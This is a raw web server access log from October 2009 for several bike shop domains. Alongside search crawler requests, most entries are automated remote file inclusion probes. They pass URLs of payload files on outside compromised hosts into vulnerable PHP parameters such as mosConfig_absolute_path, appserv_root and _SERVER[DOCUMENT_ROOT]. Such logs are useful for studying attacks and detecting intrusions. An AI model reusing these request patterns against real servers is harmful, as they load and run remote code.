65.55.51.114 - - [10/Oct/2009:03:46:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
222.122.72.216 - - [10/Oct/2009:03:58:52 -0700] "GET /appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:03:58:52 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:03:58:52 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:03:58:52 -0700] "GET /appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:03:58:52 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:03:58:52 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:03:58:52 -0700] "GET /appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:03:58:52 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:03:58:52 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:04:03:27 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:04:03:27 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:04:03:27 -0700] "GET /appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:04:05:24 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:04:05:24 -0700] "GET /appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:04:05:24 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:04:05:25 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:04:05:25 -0700] "GET /appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.72.216 - - [10/Oct/2009:04:05:25 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.51.114 - - [10/Oct/2009:04:15:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
82.193.15.3 - - [10/Oct/2009:04:29:50 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:04:29:51 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:04:29:58 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:04:37:48 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:04:37:48 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:04:37:48 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.133.251.119 - - [10/Oct/2009:04:39:08 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.133.251.119 - - [10/Oct/2009:04:39:08 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.133.251.119 - - [10/Oct/2009:04:39:08 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.110.142.156 - - [10/Oct/2009:04:40:50 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.110.142.156 - - [10/Oct/2009:04:40:50 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.110.142.156 - - [10/Oct/2009:04:40:50 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.133.251.119 - - [10/Oct/2009:04:41:07 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.110.142.156 - - [10/Oct/2009:04:41:28 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.110.142.156 - - [10/Oct/2009:04:41:28 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.110.142.156 - - [10/Oct/2009:04:41:28 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:04:43:26 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:04:43:26 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:04:43:26 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.110.142.156 - - [10/Oct/2009:04:44:11 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:04:44:27 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:04:44:27 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:04:44:27 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.110.142.156 - - [10/Oct/2009:04:45:05 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.46.189 - - [10/Oct/2009:04:52:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "houstonbikeshop.com"
221.143.46.189 - - [10/Oct/2009:04:52:52 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "houstonbikeshop.com"
221.143.46.189 - - [10/Oct/2009:04:52:52 -0700] "GET /translations/Galician.txt//tools/send_reminders.php?noSet=0&includedir=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "houstonbikeshop.com"
221.143.46.189 - - [10/Oct/2009:04:52:52 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:04:54:21 -0700] "GET /logs/access.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.detroitprep.net/orca/hard.gif??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:04:54:21 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.detroitprep.net/orca/hard.gif??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:04:54:22 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.detroitprep.net/orca/hard.gif??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.244.233.123 - - [10/Oct/2009:04:55:32 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.alandar.net/www2/cid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
66.244.233.123 - - [10/Oct/2009:04:55:33 -0700] "GET /administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.alandar.net/www2/cid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
66.244.233.123 - - [10/Oct/2009:04:55:33 -0700] "GET /logs//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.alandar.net/www2/cid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
206.225.23.4 - - [10/Oct/2009:04:55:36 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [10/Oct/2009:04:55:36 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [10/Oct/2009:04:55:36 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [10/Oct/2009:04:55:36 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [10/Oct/2009:04:55:36 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [10/Oct/2009:04:55:36 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.46.189 - - [10/Oct/2009:04:56:46 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:04:58:32 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [10/Oct/2009:04:58:45 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [10/Oct/2009:04:58:45 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [10/Oct/2009:04:58:45 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [10/Oct/2009:04:58:55 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [10/Oct/2009:04:58:56 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [10/Oct/2009:04:58:56 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:04:59:11 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.46.189 - - [10/Oct/2009:05:01:16 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "houstonbikeshop.com"
221.143.46.189 - - [10/Oct/2009:05:01:18 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "bicyclestoreshouston.com"
221.143.46.189 - - [10/Oct/2009:05:01:18 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "bicyclestoreshouston.com"
221.143.46.189 - - [10/Oct/2009:05:01:18 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "bicyclestoreshouston.com"
203.185.129.36 - - [10/Oct/2009:05:02:55 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:02:55 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:02:55 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.46.189 - - [10/Oct/2009:05:02:58 -0700] "GET /translations/German.txt//tools/send_reminders.php?noSet=0&includedir=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:05:03:19 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:04:34 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:04:34 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:04:34 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [10/Oct/2009:05:05:55 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:08:33 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:08:33 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:08:33 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:08:34 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:08:34 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:08:34 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:10:33 -0700] "GET /logs/setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:10:33 -0700] "GET /logs/access.log%20%20/setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:10:33 -0700] "GET /setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:10:35 -0700] "GET /logs/access.log%20%20/setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:10:35 -0700] "GET /setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.185.129.36 - - [10/Oct/2009:05:10:35 -0700] "GET /logs/setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:05:12:16 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [10/Oct/2009:05:15:43 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://montaguekorea.com/upload/bbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [10/Oct/2009:05:15:43 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://montaguekorea.com/upload/bbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [10/Oct/2009:05:15:43 -0700] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://montaguekorea.com/upload/bbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [10/Oct/2009:05:27:46 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://montaguekorea.com/upload/bbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.51.114 - - [10/Oct/2009:05:29:56 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
220.181.94.230 - - [10/Oct/2009:05:30:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "-" "bicyclestoreshouston.com"
65.55.115.176 - - [10/Oct/2009:05:38:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.51.114 - - [10/Oct/2009:06:01:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
74.6.17.164 - - [10/Oct/2009:06:07:16 -0700] "GET /translations/Danish.txt HTTP/1.0" 200 31970 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
65.55.115.151 - - [10/Oct/2009:06:09:12 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
72.30.161.243 - - [10/Oct/2009:06:15:26 -0700] "GET /translations/?M=A HTTP/1.0" 200 3831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
65.55.51.114 - - [10/Oct/2009:06:27:06 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
83.16.135.210 - - [10/Oct/2009:06:33:40 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
